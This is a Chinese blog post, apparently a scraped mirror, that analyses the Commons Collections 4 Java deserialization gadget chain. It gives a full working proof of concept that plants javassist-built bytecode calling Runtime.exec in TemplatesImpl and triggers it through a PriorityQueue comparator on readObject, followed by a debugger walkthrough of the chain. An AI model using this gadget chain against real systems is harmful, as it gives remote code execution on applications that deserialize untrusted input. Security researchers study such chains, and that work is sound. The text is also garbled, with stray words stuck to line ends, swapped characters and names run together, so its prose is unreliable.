文章首发:Java安全之CC4分析html
继续来分析一波CC4的链,在写该文前,看到网上大部分的文章都只给了一个调用链和POC。其实看CC4调用链的时候,能看出来CC4的调用链用到的也是前面的一些类去构造,只不过把CC2 和CC3的链给拼接了一下。java
Java安全之Commons Collections2分析apache
Java安全之Commons Collections3分析api
package com.test; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.*; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InstantiateTransformer; import javax.xml.transform.Templates; import java.io.*; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.util.PriorityQueue; public class cc4 { public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException { String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"; String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; ClassPool classPool=ClassPool.getDefault(); classPool.appendClassPath(AbstractTranslet); CtClass payload=classPool.makeClass("CommonsCollections44444444"); payload.setSuperclass(classPool.get(AbstractTranslet)); payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");"); byte[] bytes = payload.toBytecode(); Object templates = Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance(); Field field=templates.getClass().getDeclaredField("_bytecodes"); field.setAccessible(true); field.set(templates,new byte[][]{bytes}); Field name=templates.getClass().getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"test"); Transformer[] trans = new Transformer[]{ new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer( new Class[]{Templates.class}, new Object[]{templates}) }; ChainedTransformer chian = new ChainedTransformer(trans); TransformingComparator transCom = new TransformingComparator(chian); PriorityQueue queue = new PriorityQueue(2); queue.add(1); queue.add(1); Field com = PriorityQueue.class.getDeclaredField("comparator"); com.setAccessible(true); com.set(queue,transCom); ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out")); outputStream.writeObject(queue); outputStream.close(); ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out")); inputStream.readObject(); } }
用网上的POC作了一个小小的改动。数组
前面的一大段代码,在这里就不分析了,由于在CC2和CC3的链中,都是同样的。安全
Transformer[] trans = new Transformer[]{ new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer( new Class[]{Templates.class}, new Object[]{templates}) }; ChainedTransformer chian = new ChainedTransformer(trans); TransformingComparator transCom = new TransformingComparator(chian);
CC4链中在这段代码中就作了一个简单的修改。app
第一步是new了一个ConstantTransformer
对象存储在Transformer[]
数组中传入的参数是TrAXFilter.class
,若是调用到ConstantTransformer
实例化对象的transform
方法会直接返回一个TrAXFilter
对象。this
第二步new了一个InstantiateTransformer
对象传入的是Templates.class
和构造的恶意templates
实例化对象。3d
第三步是使用了ChainedTransformer
的修饰器将Transformer[]
数组传入参数,当调用transform
方法将给Transformer[]
数组给遍历调用transform
方法。调试
第四步将ChainedTransformer
修饰后的对象再使用TransformingComparator
修饰器给修饰一遍,这里再使用TransformingComparator
来修饰一下,这样等调用到该实例化对象的compare
,方法的时候就会去遍历调用Transformer[]
的transform
方法。
Field com = PriorityQueue.class.getDeclaredField("comparator"); com.setAccessible(true); com.set(queue,transCom);
这里反射获取PriorityQueue
的成员变量comparator
,而后设置PriorityQueue
的comparator
值为transCom
。
其余的都和前面的如出一辙,这里就不作具体分析了,感兴趣的能够去看看前面3条链的一个调试和分析过程。下面来作CC链的调试。
该链中利用的也是经过PriorityQueue
的readObject
做为入口点。在该readObject
复写点打个断点进行跟踪。
在readObject
会调用到heapify
方法。跟进一下heapify
方法
heapify
方法会再去调用siftDown
方法
在这里若是comparator
不为空,还会继续调用siftDownUsingComparator
方法,comparator
在这里是被修饰的Transformer[]
数组。前面使用反射去进行设置的。继续跟进siftDownUsingComparator
方法。
到了这一步后,就会调用comparator
的compare
方法,在前面使用到了TransformingComparator
来修饰,全部调用到TransformingComparator
的compare
方法。
在被TransformingComparator
修饰前,还使用了ChainedTransformer
修饰器进行修饰,在this.transformer
为ChainedTransformer
的实例化对象。因此这里调用的是ChainedTransformer
的transform
。前面也提过该方法会遍历调用Transformer[]
数组的transform
方法。
在第一次遍历调用transform
方法时i,由于前面Transformer[]
存储的第一个是ConstantTransformer
。ConstantTransformer
的transform
会直接返回TrAXFilter
对象。
第二次调用的时候则是传入TrAXFilter
调用InstantiateTransformer
的transform
方法。
这里的this.iParamTypes
为templates
,而this.iArgs
为构造的恶意TemplatesImpl
实例化对象。
那么这一步就是获取TrAXFilter
为templates
的构造方法。而后调用该构造方法实例化对象,而且传入TemplatesImpl
恶意类。跟进到TrAXFilter
构造方法里面,查看一下具体实现。
在他的构造方法里面还会对传入的对象调用newTransformer
方法。
此时传入的是恶意的TemplatesImpl
实例化对象。调用的则是TemplatesImpl
的newTransformer
方法。继续跟进。
在该方法还会调用到getTransletInstance
方法。继续跟进。
到了这里会判断_class
为空的话就会去调用defineTransletClasses
进行赋值。跟踪一下defineTransletClasses
方法查看是如何赋值的。
_bytecodes
对_class
进行赋值。_bytecodes
为Runtime
类执行命令代码的字节码。
在执行完方法后,来到下一步。
对_class
进行newInstance
,进行实例化对象。执行完这一步后,就会弹出计算器,也就是说执行了咱们前面构造好的命令执行代码。
getTransletInstancePriorityQueue.readObject->PriorityQueue.heapify ->PriorityQueue.siftDown->PriorityQueue.siftDownUsingComparator ->TransformingComparator.compare->ChainedTransformer.transform ->TrAXFilter(构造方法)->TemplatesImpl.newTransformer ->TemplatesImpl.getTransletInstance->TemplatesImpl.defineTransletClasses ->(动态建立的类)cc4.newInstance()->Runtime.exec()
在CC1和CC3里面只能在低版本执行,而CC2和CC4能够在1.8 的版本下执行,调试CC1,3用的是JDK7u21版本,而2和4使用的是jdk8U181版本,亲测可用。
CC4的链在一开始并不想去作一个分析,由于和前面分析的链基本同样。可是仍是须要把它给记录下来,也能够去加深一下影响。